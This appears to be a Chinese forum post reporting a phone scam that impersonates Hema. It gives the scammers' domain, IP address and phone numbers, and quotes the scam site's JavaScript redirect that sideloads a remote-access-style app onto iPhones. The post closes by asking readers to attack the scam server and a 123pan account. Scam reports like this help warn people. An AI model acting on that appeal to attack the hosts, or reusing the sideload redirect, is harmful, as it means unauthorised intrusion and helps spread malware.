短信是【盒马】开头的手机就识别成盒马的图标,短信内容是“盒马会员已到期,已自动续费,如需关闭续费联系客服,04527214567”
黑龙江号码,一看就不对劲,那边非常吵估计骗子群体不少,让我下一个 app,开始给的网址是 0435656.cc。因为我手机浏览器开了 pc 模式,打开是 404,
后面有给了一个 ip 地址38.177.232.184,这个服务器是韩国的,
下载 app 时间非长,这骗子很有耐心的等我下完安装,
这个 app 很有意思,是一个 1 对1 的客服程序,
索要的权限很多 通讯录,麦克风,视频,屏幕共享。我都给禁止了。看到屏幕共享 我就感觉不对劲,也就没继续直接挂了。
等到电脑前研究一下他的网站,发现还有苹果的安装,
window.location.href = 'itms-services://?action=download-manifest&url=https://vip.123pan.cn/1837883303/ipa/ios.plist'
123pan 居然还有电话号码。1837883303是南宁归属地。
这就很有意思了,破案一样。
有没有能人来为民除害 攻击下这个 服务器,还有这个 123pan 的账户。
